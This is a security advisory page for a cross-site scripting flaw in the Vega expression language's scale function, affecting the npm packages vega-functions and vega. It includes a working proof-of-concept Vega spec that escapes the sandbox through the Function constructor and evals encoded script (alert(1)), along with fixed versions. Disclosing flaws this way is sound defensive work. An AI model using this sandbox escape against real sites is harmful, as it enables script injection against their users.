GHSA-4vq7-882g-wcg4

Suggest an improvement
Source
https://github.com/advisories/GHSA-4vq7-882g-wcg4
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-4vq7-882g-wcg4/GHSA-4vq7-882g-wcg4.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-4vq7-882g-wcg4
Aliases
Published
2023-03-02T23:11:05Z
Modified
2023-11-08T04:12:02.084299Z
Severity
  • 6.1 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N CVSS Calculator
Summary
Vega Expression Language `scale` expression function Cross Site Scripting
Details

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA

References

Affected packages

npm / vega-functions

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
5.13.1

npm / vega

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
5.23.0